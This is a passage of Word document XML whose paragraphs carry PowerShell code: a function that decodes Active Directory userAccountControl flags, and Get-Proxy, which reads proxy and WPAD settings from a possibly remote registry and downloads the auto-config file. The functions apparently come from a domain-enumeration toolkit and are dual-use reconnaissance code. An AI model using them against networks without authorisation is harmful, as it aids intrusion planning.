    <w:p w14:paraId="3B9DC30E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E50C14F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B14C9A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17887F88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # values from https://support.microsoft.com/en-us/kb/305144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A914E0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues = New-Object System.Collections.Specialized.OrderedDictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C847E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("SCRIPT", 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523B6F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("ACCOUNTDISABLE", 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562E9F08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("HOMEDIR_REQUIRED", 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597E16D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("LOCKOUT", 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0058A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("PASSWD_NOTREQD", 32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D14B0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("PASSWD_CANT_CHANGE", 64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538722F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71814DB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("TEMP_DUPLICATE_ACCOUNT", 256)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F51C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("NORMAL_ACCOUNT", 512)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D401EB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE76F3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("WORKSTATION_TRUST_ACCOUNT", 4096)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA303FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("SERVER_TRUST_ACCOUNT", 8192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC439E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("DONT_EXPIRE_PASSWORD", 65536)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711AEE45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("MNS_LOGON_ACCOUNT", 131072)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3133C028" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("SMARTCARD_REQUIRED", 262144)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295F985F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $UACValues.Add("TRUSTED_FOR_DELEGATION", 524288)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365462F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("NOT_DELEGATED", 1048576)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F425276" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("USE_DES_KEY_ONLY", 2097152)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E626D74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("DONT_REQ_PREAUTH", 4194304)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010DED43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("PASSWORD_EXPIRED", 8388608)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E53C8F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F511986" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D09B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1779FC49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DD03158" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701D8FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CEDF120" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48074E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="394D1B65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Value -is [Int]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E20C66F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $IntValue = $Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A697AE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BA217" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif ($Value -is [PSCustomObject]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA62779" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Value.useraccountcontrol) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44FBA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $IntValue = $Value.useraccountcontrol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A767C46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A5E05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45E8CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E007AB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning "Invalid object input for -Value : $Value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437025C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $Null </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40653933" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06503C70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F2B3F2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ShowAll) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49235473" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            foreach ($UACValue in $UACValues.GetEnumerator()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B94F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193EDC17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E2AB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38093F1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C721D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53690014" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34DF18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FA822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C20979" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F26117" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            foreach ($UACValue in $UACValues.GetEnumerator()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14838C0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A04FED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4226E6FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6977E148" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A668A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250C9EBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ResultUACValues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703293FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F648795" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB25957" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B1A1BE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03AD105D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-Proxy {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2159700B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2C0892" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751BA2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75605B56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerates the proxy server and WPAD conents for the current user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9CF046" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7BBA74FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B26D34B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B84C5E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The computername to enumerate proxy settings on, defaults to local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA81638" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E690EC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68B71E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F45D709" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-Proxy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455745A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40178875" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the current proxy settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DACF36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C3B3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618946DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A704C7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71339786" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6348E564" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = $ENV:COMPUTERNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9514F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851B67F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31D308AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08005C7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', $ComputerName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9157C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RegKey = $Reg.OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E9E301" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ProxyServer = $RegKey.GetValue('ProxyServer')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB6769B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $AutoConfigURL = $RegKey.GetValue('AutoConfigURL')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0D899" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73B23993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Wpad = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1757ADFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($AutoConfigURL -and ($AutoConfigURL -ne "")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BAD134" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF868E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Wpad = (New-Object Net.Webclient).DownloadString($AutoConfigURL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADCEB17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58339949" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C6DBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning "Error connecting to AutoConfigURL : $AutoConfigURL"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B0543" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE5C31D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B1F67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D709386" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ProxyServer -or $AutoConfigUrl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8651B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12AB862B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Properties = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5946CC6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'ProxyServer' = $ProxyServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D6344" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'AutoConfigURL' = $AutoConfigURL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75F03B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Wpad' = $Wpad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8E010A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCAD544" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F647CA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            New-Object -TypeName PSObject -Property $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0DE7C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980CAF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6C570" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning "No proxy settings found for $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62012883" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C06B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1ADEF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E7A76F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Warning "Error enumerating proxy settings for $ComputerName : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F05BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C419C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
